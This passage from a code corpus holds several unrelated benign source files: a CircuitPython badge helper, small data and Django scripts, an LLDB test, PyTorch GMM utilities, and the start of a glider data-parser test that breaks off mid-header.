repo_path: adafruit_circuitpython_libs/adafruit-circuitpython-bundle-py-20210214/lib/adafruit_pybadger/pewpewm4.py | repo_name: jacoblb64/pico_rgb_keypad_hid | head_hexsha: 3251ca6a98ef86d9f98c54f639c4d61810601a0b | licenses: ["MIT"]
stars: 47 [2021-02-15T23:02:36.000Z to 2022-03-04T21:30:03.000Z] | issues: 7 [2021-02-19T20:00:08.000Z to 2022-01-14T10:51:12.000Z] | forks: 14 [2021-02-20T17:40:56.000Z to 2022-01-01T19:53:38.000Z] |
# SPDX-FileCopyrightText: 2020 Kattni Rembor for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_pybadger.pewpewm4`
================================================================================
Badge-focused CircuitPython helper library for Pew Pew M4.
* Author(s): Kattni Rembor
Implementation Notes
--------------------
**Hardware:**
* `Pew Pew M4 <https://hackaday.io/project/165032-pewpew-m4>`_
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
from collections import namedtuple
import board
import digitalio
import audioio
from gamepad import GamePad
from adafruit_pybadger.pybadger_base import PyBadgerBase
__version__ = "3.2.2"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_PyBadger.git"
Buttons = namedtuple("Buttons", ("o", "x", "z", "right", "down", "up", "left"))
class PewPewM4(PyBadgerBase):
"""Class that represents a single Pew Pew M4."""
_audio_out = audioio.AudioOut
_neopixel_count = 0
def __init__(self):
super().__init__()
self._buttons = GamePad(
digitalio.DigitalInOut(board.BUTTON_O),
digitalio.DigitalInOut(board.BUTTON_X),
digitalio.DigitalInOut(board.BUTTON_Z),
digitalio.DigitalInOut(board.BUTTON_RIGHT),
digitalio.DigitalInOut(board.BUTTON_DOWN),
digitalio.DigitalInOut(board.BUTTON_UP),
digitalio.DigitalInOut(board.BUTTON_LEFT),
)
@property
def button(self):
"""The buttons on the board.
Example use:
.. code-block:: python
from adafruit_pybadger import pybadger
while True:
if pybadger.button.x:
print("Button X")
elif pybadger.button.o:
print("Button O")
"""
button_values = self._buttons.get_pressed()
return Buttons(
*[
button_values & button
for button in (
PyBadgerBase.BUTTON_B,
PyBadgerBase.BUTTON_A,
PyBadgerBase.BUTTON_START,
PyBadgerBase.BUTTON_SELECT,
PyBadgerBase.BUTTON_RIGHT,
PyBadgerBase.BUTTON_DOWN,
PyBadgerBase.BUTTON_UP,
)
]
)
@property
def _unsupported(self):
"""This feature is not supported on PewPew M4."""
raise NotImplementedError("This feature is not supported on PewPew M4.")
    # The following is a list of the features available in other PyBadger modules but
    # not available for the PewPew M4. If called while using a PewPew M4, they will
    # result in the NotImplementedError raised in the property above.
light = _unsupported
acceleration = _unsupported
pixels = _unsupported
pewpewm4 = PewPewM4() # pylint: disable=invalid-name
"""Object that is automatically created on import."""
| avg_line_length: 28.224299 | max_line_length: 85 | alphanum_fraction: 0.614901 |
hexsha: 5e407c76203f0d695751560db53312f94d4dd1e3 | size: 494 | ext: py | lang: Python
repo_path: update_ratings.py | repo_name: ClumsyLee/metanime | head_hexsha: 3534b3c7a980b7a879497d9b1de7040b16b5c439 | licenses: ["MIT"]
stars: 2 [2019-02-07T07:24:11.000Z to 2019-04-22T17:21:25.000Z] | issues: null | forks: null |
import logging
import sys
from metanime import Anime
def update_ratings(season, slug=None):
filename = f'seasons/{season}.yml'
animes = Anime.load(filename)
for anime in animes:
if slug is not None and anime.slug != slug:
continue
logging.info('Updating %s...', anime.slug)
anime.update_ratings()
Anime.dump(animes, filename)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
update_ratings(*sys.argv[1:])
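# Invocation sketch (illustrative only; the season and slug values are
# hypothetical and must correspond to an existing seasons/<season>.yml):
#
#   python update_ratings.py 2019-spring
#   python update_ratings.py 2019-spring some-anime-slug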
| avg_line_length: 21.478261 | max_line_length: 51 | alphanum_fraction: 0.65587 |
hexsha: d0b066e02b094a5648470beb6139ec10a833c5fe | size: 409 | ext: py | lang: Python
repo_path: djangorestapidrf/wsgi.py | repo_name: arabindamahato/DjangoREST_API_DRF | head_hexsha: 5292f47c4f29e64de4b5c15dc254a892b2661639 | licenses: ["MIT"]
stars: null | issues: 4 [2021-03-19T01:51:07.000Z to 2021-09-22T18:52:10.000Z] | forks: null |
"""
WSGI config for djangorestapidrf project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangorestapidrf.settings')
application = get_wsgi_application()
| avg_line_length: 24.058824 | max_line_length: 78 | alphanum_fraction: 0.794621 |
hexsha: d23428e7fca4006b30d88e7b81ae7e475f12135d | size: 1,861 | ext: py | lang: Python
repo_path: lldb/packages/Python/lldbsuite/test/lang/objc/foundation/TestRuntimeTypes.py | repo_name: dan-zheng/llvm-project | head_hexsha: 6b792850da0345274758c9260fda5df5e57ab486 | licenses: ["Apache-2.0"]
stars: 765 [2015-12-03T16:44:59.000Z to 2022-03-07T12:41:10.000Z] | issues: 1,815 [2015-12-11T23:56:05.000Z to 2020-01-10T19:28:43.000Z] | forks: 284 [2015-12-03T16:47:25.000Z to 2022-03-12T05:39:48.000Z] |
"""
Test that Objective-C methods from the runtime work correctly.
"""
from __future__ import print_function
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
@skipUnlessDarwin
class RuntimeTypesTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
@expectedFailureAll(
oslist=["macosx"],
debug_info="gmodules",
bugnumber="llvm.org/pr27862")
def test_break(self):
"""Test setting objc breakpoints using '_regexp-break' and 'breakpoint set'."""
if self.getArchitecture() != 'x86_64':
self.skipTest("This only applies to the v2 runtime")
self.build()
exe = self.getBuildArtifact("a.out")
self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET)
# Stop at -[MyString description].
lldbutil.run_break_set_by_symbol(
self,
'-[MyString description]',
num_expected_locations=1,
sym_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The backtrace should show we stop at -[MyString description].
self.expect("thread backtrace", "Stop at -[MyString description]",
substrs=["a.out`-[MyString description]"])
# Use runtime information about NSString.
# The length property should be usable.
self.expect("expression str.length", VARIABLES_DISPLAYED_CORRECTLY,
patterns=[r"(\(unsigned long long\))|\(NSUInteger\)"])
# Static methods on NSString should work.
self.expect(
"expr [NSString stringWithCString:\"foo\" encoding:1]",
VALID_TYPE,
substrs=[
"(id)",
"$1"])
self.expect("po $1", VARIABLES_DISPLAYED_CORRECTLY,
substrs=["foo"])
| avg_line_length: 30.508197 | max_line_length: 87 | alphanum_fraction: 0.616873 |
hexsha: 4c73449076922c3ac71c5850c2b4e34b5e98f480 | size: 674 | ext: py | lang: Python
repo_path: notebooks/Exploration.py | repo_name: N4v1ds0n/king_county_EDA | head_hexsha: e4245bcb65faae1e4f89bd71301f351ab473743b | licenses: ["MIT"]
stars: null | issues: null | forks: null |
#This is where the code hits
import matplotlib.pyplot as plt
import pandas as pd
#%matplotlib inline
data = pd.read_csv("../data/King_County_House_prices_dataset.csv")
# Scatter-plot every pair of columns against each other and save each figure.
for column in data.columns:
    for column2 in data.columns:
        plot = data.plot(title=column + ' ' + column2, x=column, y=column2,
                         kind='scatter', lw=2, colormap='jet')
        plot.set_xlabel(column)
        plot.set_ylabel(column2)
        plt.savefig('images/' + column + '-vs-' + column2 + '.png')
        plt.close()
| avg_line_length: 32.095238 | max_line_length: 116 | alphanum_fraction: 0.673591 |
hexsha: c1d1d3d6604e9d7a7b540a66352830f02403966c | size: 2,352 | ext: py | lang: Python
repo_path: tests/models/symbol/pit_consistency_group_deletion_descriptor_test.py | repo_name: NetApp/santricity-webapi-pythonsdk | head_hexsha: 1d3df4a00561192f4cdcdd1890f4d27547ed2de2 | licenses: ["BSD-3-Clause-Clear"]
stars: 5 [2016-08-23T17:52:22.000Z to 2019-05-16T08:45:30.000Z] | issues: 2 [2016-11-10T05:30:21.000Z to 2019-04-05T15:03:37.000Z] | forks: 7 [2016-08-25T16:11:44.000Z to 2021-02-22T05:31:25.000Z] |
#!/usr/bin/env python
# coding: utf-8
"""
The Clear BSD License
Copyright (c) – 2016, NetApp, Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of NetApp, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import unittest
from netapp.santricity.models.symbol.pit_consistency_group_deletion_descriptor import PITConsistencyGroupDeletionDescriptor
class PITConsistencyGroupDeletionDescriptorTest(unittest.TestCase):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
# Try instantiating the model
def test_pit_consistency_group_deletion_descriptor(self):
pit_consistency_group_deletion_descriptor_obj = PITConsistencyGroupDeletionDescriptor()
self.assertNotEqual(pit_consistency_group_deletion_descriptor_obj, None)
| avg_line_length: 61.894737 | max_line_length: 845 | alphanum_fraction: 0.789966 |
hexsha: 3223fd10a9346402503ec80ebd2f713e01872aaf | size: 1,140 | ext: py | lang: Python
repo_path: check_line_length.py | repo_name: EdgeKing810/openwisp2-docs | head_hexsha: 4a7c06ddb6dcad1a66cfe2e1ba6b087a4a83277b | licenses: ["BSD-3-Clause"]
stars: null | issues: null | forks: null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import glob
import os
import re
import sys
LIMIT = 75
def check_url(line):
"""
Check if there is a url present in the given line
"""
    pattern = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
url = re.findall(pattern, line)
return bool(url)
def check_line_length(file_path):
"""
    Ensure that every line in the file at ``file_path`` is no longer than
    ``LIMIT`` characters (lines containing a URL are exempt); interrupt
    execution with exit code 1 otherwise.
"""
file = file_path.split('/')[-1]
with open(file_path) as f:
lines = f.readlines()
for (line_number, line) in enumerate(lines, start=1):
length = len(line)
if length > LIMIT and check_url(line) is not True:
print('line {} in file {} is longer '
'than {} characters'.format(line_number, file, LIMIT))
sys.exit(1)
def main():
current_path = os.getcwd()
file_paths = glob.glob(current_path + '/**/*.rst')
for file_path in file_paths:
check_line_length(file_path)
if __name__ == '__main__':
main()
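# Quick doctest-style checks for check_url (illustrative only):
#
#   >>> check_url('see https://example.com/page for details')
#   True
#   >>> check_url('no links in this line')
#   False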
| avg_line_length: 24.782609 | max_line_length: 95 | alphanum_fraction: 0.588596 |
hexsha: 706f670cccb0e997ff749dc96938bcfa63a5196b | size: 2,669 | ext: py | lang: Python
repo_path: utils/gmm_utils.py | repo_name: omegafragger/TransGAN | head_hexsha: ed2590026c4534fe778f11da614e4f22e15ff1d9 | licenses: ["MIT"]
stars: null | issues: null | forks: null |
import torch
from torch import nn
from tqdm import tqdm
DOUBLE_INFO = torch.finfo(torch.double)
JITTERS = [0, DOUBLE_INFO.tiny] + [10 ** exp for exp in range(-50, 0, 5)]
def centered_cov_torch(x):
n = x.shape[0]
res = 1 / (n - 1) * x.t().mm(x)
return res
def get_embeddings(
net, loader: torch.utils.data.DataLoader, num_dim: int, dtype, device, storage_device,
):
num_samples = len(loader.dataset)
embeddings = torch.empty((num_samples, num_dim), dtype=dtype, device=storage_device)
labels = torch.empty(num_samples, dtype=torch.int, device=storage_device)
with torch.no_grad():
start = 0
for data, label in tqdm(loader):
data = data.to(device)
label = label.to(device)
if isinstance(net, nn.DataParallel):
out = net.module(data)
out = net.module.feature
else:
out = net(data)
out = net.feature
end = start + len(data)
embeddings[start:end].copy_(out, non_blocking=True)
labels[start:end].copy_(label, non_blocking=True)
start = end
return embeddings, labels
def gmm_forward(net, gaussians_model, data_B_X):
if isinstance(net, nn.DataParallel):
features_B_Z = net.module(data_B_X)
features_B_Z = net.module.feature
else:
features_B_Z = net(data_B_X)
features_B_Z = net.feature
log_probs_B_Y = gaussians_model.log_prob(features_B_Z[:, None, :])
return log_probs_B_Y
def gmm_fit(embeddings, labels, num_classes):
with torch.no_grad():
classwise_mean_features = torch.stack([torch.mean(embeddings[labels == c], dim=0) for c in range(num_classes)])
classwise_cov_features = torch.stack(
[centered_cov_torch(embeddings[labels == c] - classwise_mean_features[c]) for c in range(num_classes)]
)
    with torch.no_grad():
        # Escalate the diagonal jitter until the covariance matrices are
        # positive definite enough for MultivariateNormal's Cholesky step.
        for jitter_eps in JITTERS:
            print(jitter_eps)
try:
jitter = jitter_eps * torch.eye(
classwise_cov_features.shape[1], device=classwise_cov_features.device,
).unsqueeze(0)
gmm = torch.distributions.MultivariateNormal(
loc=classwise_mean_features, covariance_matrix=(classwise_cov_features + jitter),
)
except RuntimeError as e:
if "cholesky" in str(e):
continue
except ValueError as e:
if "The parameter covariance_matrix has invalid values" in str(e):
continue
break
return gmm, jitter_eps
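# Minimal end-to-end sketch (illustrative only; the data is synthetic and the
# variable names are hypothetical). Shapes follow gmm_fit/gmm_forward above:
if __name__ == "__main__":
    embeddings = torch.randn(100, 8, dtype=torch.double)
    labels = torch.randint(0, 3, (100,))
    gmm, used_jitter = gmm_fit(embeddings, labels, num_classes=3)
    log_probs = gmm.log_prob(embeddings[:, None, :])  # shape: (N, num_classes)
    print(log_probs.shape, used_jitter)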
| avg_line_length: 32.54878 | max_line_length: 119 | alphanum_fraction: 0.606594 |
hexsha: ac423549915f6011e161f05f4a60b8705c03009b | size: 88,625 | ext: py | lang: Python
repo_path: mi/dataset/parser/test/test_glider.py | repo_name: krosburg/mi-instrument | head_hexsha: aa962fd1869a582aa3f712b7ae8c6ce2d7d3785a | licenses: ["BSD-2-Clause"]
stars: null | issues: null | forks: null |
#!/usr/bin/env python
"""
@package mi.dataset.parser.test.test_glider Base dataset parser test code
@file mi/dataset/parser/test/test_glider.py
@author Chris Wingard, Stuart Pearce, Nick Almonte
@brief Test code for a Glider data parser.
"""
import os
from StringIO import StringIO
from nose.plugins.attrib import attr
from mi.core.exceptions import ConfigurationException
from mi.core.log import get_logger
from mi.dataset.parser.utilities import particle_to_yml
from mi.dataset.test.test_parser import ParserUnitTestCase
from mi.dataset.driver.moas.gl.ctdgv.resource import RESOURCE_PATH as CTDGV_RESOURCE_PATH
from mi.dataset.driver.moas.gl.dosta.resource import RESOURCE_PATH as DOSTA_RESOURCE_PATH
from mi.dataset.driver.moas.gl.engineering.resource import RESOURCE_PATH as ENG_RESOURCE_PATH
from mi.dataset.driver.moas.gl.flord_m.resource import RESOURCE_PATH as FLORD_M_RESOURCE_PATH
from mi.dataset.driver.moas.gl.flort_m.resource import RESOURCE_PATH as FLORT_M_RESOURCE_PATH
from mi.dataset.driver.moas.gl.flort_o.resource import RESOURCE_PATH as FLORT_O_RESOURCE_PATH
from mi.dataset.driver.moas.gl.parad.resource import RESOURCE_PATH as PARAD_RESOURCE_PATH
from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.parser.glider import GliderParser, GliderEngineeringParser
from mi.dataset.parser.glider import CtdgvRecoveredDataParticle, CtdgvTelemeteredDataParticle, CtdgvParticleKey
from mi.dataset.parser.glider import DostaTelemeteredDataParticle, DostaTelemeteredParticleKey
from mi.dataset.parser.glider import DostaRecoveredDataParticle, DostaRecoveredParticleKey
from mi.dataset.parser.glider import FlordRecoveredDataParticle, FlordTelemeteredDataParticle, FlordParticleKey
from mi.dataset.parser.glider import FlortRecoveredDataParticle, FlortRecoveredParticleKey
from mi.dataset.parser.glider import FlortTelemeteredDataParticle, FlortTelemeteredParticleKey
from mi.dataset.parser.glider import FlortODataParticle, FlortODataParticleKey
from mi.dataset.parser.glider import ParadRecoveredDataParticle, ParadRecoveredParticleKey
from mi.dataset.parser.glider import ParadTelemeteredDataParticle, ParadTelemeteredParticleKey
from mi.dataset.parser.glider import EngineeringTelemeteredParticleKey
from mi.dataset.parser.glider import EngineeringTelemeteredDataParticle
from mi.dataset.parser.glider import EngineeringScienceTelemeteredParticleKey
from mi.dataset.parser.glider import EngineeringScienceTelemeteredDataParticle
from mi.dataset.parser.glider import EngineeringMetadataParticleKey
from mi.dataset.parser.glider import EngineeringMetadataDataParticle
from mi.dataset.parser.glider import EngineeringMetadataRecoveredDataParticle
from mi.dataset.parser.glider import EngineeringRecoveredParticleKey
from mi.dataset.parser.glider import EngineeringRecoveredDataParticle
from mi.dataset.parser.glider import EngineeringScienceRecoveredParticleKey
from mi.dataset.parser.glider import EngineeringScienceRecoveredDataParticle, EngineeringClassKey
from mi.dataset.parser.glider import GpsPositionDataParticle, GpsPositionParticleKey
log = get_logger()
HEADER = """dbd_label: DBD_ASC(dinkum_binary_data_ascii)file
encoding_ver: 2
num_ascii_tags: 14
all_sensors: 0
filename: unit_363-2013-245-6-6
the8x3_filename: 01790006
filename_extension: sbd
filename_label: unit_363-2013-245-6-6-sbd(01790006)
mission_name: TRANS58.MI
fileopen_time: Thu_Sep__5_02:46:15_2013
sensors_per_cycle: 29
num_label_lines: 3
num_segments: 1
segment_filename_0: unit_363-2013-245-6-6
c_battpos c_wpt_lat c_wpt_lon m_battpos m_coulomb_amphr_total m_coulomb_current m_depth m_de_oil_vol m_gps_lat m_gps_lon m_heading m_lat m_lon m_pitch m_present_secs_into_mission m_present_time m_speed m_water_vx m_water_vy x_low_power_status sci_flbb_bb_units sci_flbb_chlor_units sci_m_present_secs_into_mission sci_m_present_time sci_oxy4_oxygen sci_oxy4_saturation sci_water_cond sci_water_pressure sci_water_temp
in lat lon in amp-hrs amp m cc lat lon rad lat lon rad sec timestamp m/s m/s m/s nodim nodim ug/l sec timestamp um % s/m bar degc
4 8 8 4 4 4 4 4 8 8 4 8 8 4 4 8 4 4 4 4 4 4 4 8 4 4 4 4 4 """
# header from sample data in ctdgv driver test
HEADER2 = """dbd_label: DBD_ASC(dinkum_binary_data_ascii)file
encoding_ver: 2
num_ascii_tags: 14
all_sensors: 0
filename: unit_363-2013-245-6-6
the8x3_filename: 01790006
filename_extension: sbd
filename_label: unit_363-2013-245-6-6-sbd(01790006)
mission_name: TRANS58.MI
fileopen_time: Thu_Sep__5_02:46:15_2013
sensors_per_cycle: 29
num_label_lines: 3
num_segments: 1
segment_filename_0: unit_363-2013-245-6-6
c_battpos c_wpt_lat c_wpt_lon m_battpos m_coulomb_amphr_total m_coulomb_current m_depth m_de_oil_vol m_gps_lat m_gps_lon m_heading m_lat m_lon m_pitch m_present_secs_into_mission m_present_time m_speed m_water_vx m_water_vy x_low_power_status sci_flbb_bb_units sci_flbb_chlor_units sci_m_present_secs_into_mission sci_m_present_time sci_oxy4_oxygen sci_oxy4_saturation sci_water_cond sci_water_pressure sci_water_temp
in lat lon in amp-hrs amp m cc lat lon rad lat lon rad sec timestamp m/s m/s m/s nodim nodim ug/l sec timestamp um % s/m bar degc
4 8 8 4 4 4 4 4 8 8 4 8 8 4 4 8 4 4 4 4 4 4 4 8 4 4 4 4 4 """
HEADER3 = """dbd_label: DBD_ASC(dinkum_binary_data_ascii)file
encoding_ver: 2
num_ascii_tags: 14
all_sensors: 0
filename: unit_247-2012-051-0-0-sf
the8x3_filename: 01840000
filename_extension: dbd
filename_label: unit_247-2012-051-0-0-dbd(01840000)
mission_name: ENDUR1.MI
fileopen_time: Tue_Feb_21_18:39:39_2012
sensors_per_cycle: 346
num_label_lines: 3
num_segments: 1
segment_filename_0: unit_247-2012-051-0-0
c_air_pump c_ballast_pumped c_battpos c_battroll c_bsipar_on c_de_oil_vol c_dvl_on c_flbbcd_on c_heading c_oxy3835_wphase_on c_pitch c_profile_on c_wpt_lat c_wpt_lon m_1meg_persistor m_aground_water_depth m_air_fill m_air_pump m_altimeter_status m_altimeter_voltage m_altitude m_altitude_rate m_appear_to_be_at_surface m_argos_is_xmitting m_argos_on m_argos_sent_data m_argos_timestamp m_at_risk_depth m_avbot_enable m_avbot_power m_avg_climb_rate m_avg_depth_rate m_avg_dive_rate m_avg_downward_inflection_time m_avg_speed m_avg_system_clock_lags_gps m_avg_upward_inflection_time m_avg_yo_time m_ballast_pumped m_ballast_pumped_energy m_ballast_pumped_vel m_battery m_battery_inst m_battpos m_battpos_vel m_battroll m_battroll_vel m_bpump_fault_bit m_certainly_at_surface m_chars_tossed_by_abend m_chars_tossed_with_cd_off m_chars_tossed_with_power_off m_climb_tot_time m_console_cd m_console_on m_cop_tickle m_coulomb_amphr m_coulomb_amphr_raw m_coulomb_amphr_total m_coulomb_current m_coulomb_current_raw m_cycle_number m_depth m_depth_rate m_depth_rate_avg_final m_depth_rate_running_avg m_depth_rate_running_avg_n m_depth_rate_subsampled m_depth_rejected m_depth_state m_depth_subsampled m_device_drivers_called_abnormally m_device_error m_device_oddity m_device_warning m_de_oil_vol m_de_oil_vol_pot_voltage m_de_pump_fault_count m_digifin_cmd_done m_digifin_cmd_error m_digifin_leakdetect_reading m_digifin_motorstep_counter m_digifin_resp_data m_digifin_status m_disk_free m_disk_usage m_dist_to_wpt m_dive_depth m_dive_tot_time m_dr_fix_time m_dr_postfix_time m_dr_surf_x_lmc m_dr_surf_y_lmc m_dr_time m_dr_x_actual_err m_dr_x_ini_err m_dr_x_postfix_drift m_dr_x_ta_postfix_drift m_dr_y_actual_err m_dr_y_ini_err m_dr_y_postfix_drift m_dr_y_ta_postfix_drift m_est_time_to_surface m_fin m_final_water_vx m_final_water_vy m_fin_vel m_fluid_pumped m_fluid_pumped_aft_hall_voltage m_fluid_pumped_fwd_hall_voltage m_fluid_pumped_vel m_free_heap m_gps_dist_from_dr m_gps_fix_x_lmc m_gps_fix_y_lmc m_gps_full_status m_gps_heading m_gps_ignored_lat m_gps_ignored_lon m_gps_invalid_lat m_gps_invalid_lon m_gps_lat m_gps_lon m_gps_mag_var m_gps_num_satellites m_gps_on m_gps_postfix_x_lmc m_gps_postfix_y_lmc m_gps_speed m_gps_status m_gps_toofar_lat m_gps_toofar_lon m_gps_uncertainty m_gps_utc_day m_gps_utc_hour m_gps_utc_minute m_gps_utc_month m_gps_utc_second m_gps_utc_year m_gps_x_lmc m_gps_y_lmc m_hdg_derror m_hdg_error m_hdg_ierror m_hdg_rate m_heading m_initial_water_vx m_initial_water_vy m_iridium_attempt_num m_iridium_call_num m_iridium_connected m_iridium_console_on m_iridium_dialed_num m_iridium_on m_iridium_redials m_iridium_signal_strength m_iridium_status m_iridium_waiting_redial_delay m_iridium_waiting_registration m_is_ballast_pump_moving m_is_battpos_moving m_is_battroll_moving m_is_de_pump_moving m_is_fin_moving m_is_fpitch_pump_moving m_is_speed_estimated m_is_thermal_valve_moving m_last_yo_time m_lat m_leak m_leakdetect_voltage m_leakdetect_voltage_forward m_leak_forward m_lithium_battery_relative_charge m_lithium_battery_status m_lithium_battery_time_to_charge m_lithium_battery_time_to_discharge m_lon m_min_free_heap m_min_spare_heap m_mission_avg_speed_climbing m_mission_avg_speed_diving m_mission_start_time m_num_half_yos_in_segment m_pitch m_pitch_energy m_pitch_error m_present_secs_into_mission m_present_time m_pressure m_pressure_raw_voltage_sample0 m_pressure_raw_voltage_sample19 m_pressure_voltage m_raw_altitude m_raw_altitude_rejected m_roll m_science_clothesline_lag m_science_on 
m_science_ready_for_consci m_science_sent_some_data m_science_sync_time m_science_unreadiness_for_consci m_spare_heap m_speed m_stable_comms m_strobe_ctrl m_surface_est_cmd m_surface_est_ctd m_surface_est_fw m_surface_est_gps m_surface_est_irid m_surface_est_total m_system_clock_lags_gps m_tcm3_is_calibrated m_tcm3_magbearth m_tcm3_poll_time m_tcm3_recv_start_time m_tcm3_recv_stop_time m_tcm3_stddeverr m_tcm3_xcoverage m_tcm3_ycoverage m_tcm3_zcoverage m_thermal_acc_pres m_thermal_acc_pres_voltage m_thermal_acc_vol m_thermal_enuf_acc_vol m_thermal_pump m_thermal_updown m_thermal_valve m_time_til_wpt m_tot_ballast_pumped_energy m_tot_horz_dist m_tot_num_inflections m_tot_on_time m_vacuum m_vehicle_temp m_veh_overheat m_veh_temp m_vmg_to_wpt m_vx_lmc m_vy_lmc m_water_cond m_water_delta_vx m_water_delta_vy m_water_depth m_water_pressure m_water_temp m_water_vx m_water_vy m_why_started m_x_lmc m_y_lmc x_last_wpt_lat x_last_wpt_lon x_system_clock_adjusted sci_bsipar_is_installed sci_bsipar_par sci_bsipar_sensor_volts sci_bsipar_supply_volts sci_bsipar_temp sci_bsipar_timestamp sci_ctd41cp_is_installed sci_ctd41cp_timestamp sci_dvl_bd_range_to_bottom sci_dvl_bd_time_since_last_good_vel sci_dvl_bd_u_dist sci_dvl_bd_v_dist sci_dvl_bd_w_dist sci_dvl_be_u_vel sci_dvl_be_v_vel sci_dvl_be_vel_good sci_dvl_be_w_vel sci_dvl_bi_err_vel sci_dvl_bi_vel_good sci_dvl_bi_x_vel sci_dvl_bi_y_vel sci_dvl_bi_z_vel sci_dvl_bs_longitudinal_vel sci_dvl_bs_normal_vel sci_dvl_bs_transverse_vel sci_dvl_bs_vel_good sci_dvl_ensemble_offset sci_dvl_error sci_dvl_is_installed sci_dvl_sa_heading sci_dvl_sa_pitch sci_dvl_sa_roll sci_dvl_ts_bit sci_dvl_ts_depth sci_dvl_ts_sal sci_dvl_ts_sound_speed sci_dvl_ts_temp sci_dvl_ts_timestamp sci_dvl_wd_range_to_water_mass_center sci_dvl_wd_time_since_last_good_vel sci_dvl_wd_u_dist sci_dvl_wd_v_dist sci_dvl_wd_w_dist sci_dvl_we_u_vel sci_dvl_we_v_vel sci_dvl_we_vel_good sci_dvl_we_w_vel sci_dvl_wi_err_vel sci_dvl_wi_vel_good sci_dvl_wi_x_vel sci_dvl_wi_y_vel sci_dvl_wi_z_vel sci_dvl_ws_longitudinal_vel sci_dvl_ws_normal_vel sci_dvl_ws_transverse_vel sci_dvl_ws_vel_good sci_flbbcd_bb_ref sci_flbbcd_bb_sig sci_flbbcd_bb_units sci_flbbcd_cdom_ref sci_flbbcd_cdom_sig sci_flbbcd_cdom_units sci_flbbcd_chlor_ref sci_flbbcd_chlor_sig sci_flbbcd_chlor_units sci_flbbcd_is_installed sci_flbbcd_therm sci_flbbcd_timestamp sci_m_disk_free sci_m_disk_usage sci_m_free_heap sci_m_min_free_heap sci_m_min_spare_heap sci_m_present_secs_into_mission sci_m_present_time sci_m_science_on sci_m_spare_heap sci_oxy3835_is_installed sci_oxy3835_oxygen sci_oxy3835_saturation sci_oxy3835_temp sci_oxy3835_timestamp sci_reqd_heartbeat sci_software_ver sci_wants_comms sci_wants_surface sci_water_cond sci_water_pressure sci_water_temp sci_x_disk_files_removed sci_x_sent_data_files
enum cc in rad sec cc sec sec rad sec rad sec lat lon bool m bool bool enum volts m m/s bool bool bool bool timestamp m bool bool m/s m/s m/s sec m/s sec sec sec cc joules cc/sec volts volts in in/sec rad rad/sec bool bool nodim nodim nodim s bool bool bool amp-hrs nodim amp-hrs amp nodim nodim m m/s m/s m/s enum m/s bool enum m nodim nodim nodim nodim cc volts nodim nodim nodim nodim nodim nodim nodim Mbytes Mbytes m m s sec sec m m sec m m m m m m m m sec rad m/s m/s rad/sec cc volts volts cc/sec bytes m m m enum rad lat lon lat lon lat lon rad nodim bool m m m/s enum lat lat nodim byte byte byte byte nodim byte m m rad/sec rad rad-sec rad/sec rad m/s m/s nodim nodim bool enum nodim bool nodim nodim enum bool bool bool bool bool bool bool bool bool bool sec lat bool volts volts bool % nodim mins mins lon bytes bytes m/s m/s timestamp nodim rad joules rad sec timestamp bar volts volts volts m bool rad s bool bool nodim timestamp enum bytes m/s bool bool nodim nodim nodim nodim nodim nodim sec bool uT ms ms ms uT % % % bar volts cc bool enum enum enum s kjoules km nodim days inHg degC bool c m/s m/s m/s S/m m/s m/s m bar degC m/s m/s enum m m lat lon sec bool ue/m^2sec volts volts degc timestamp bool timestamp m sec m m m mm/s mm/s bool mm/s mm/s bool mm/s mm/s mm/s mm/s mm/s mm/s bool nodim nodim bool deg deg deg nodim m ppt m/s degc timestamp m sec m m m mm/s mm/s bool mm/s mm/s bool mm/s mm/s mm/s mm/s mm/s mm/s bool nodim nodim nodim nodim nodim ppb nodim nodim ug/l bool nodim timestamp mbytes mbytes bytes bytes bytes sec timestamp bool bytes bool nodim nodim nodim timestamp secs nodim bool enum s/m bar degc nodim nodim
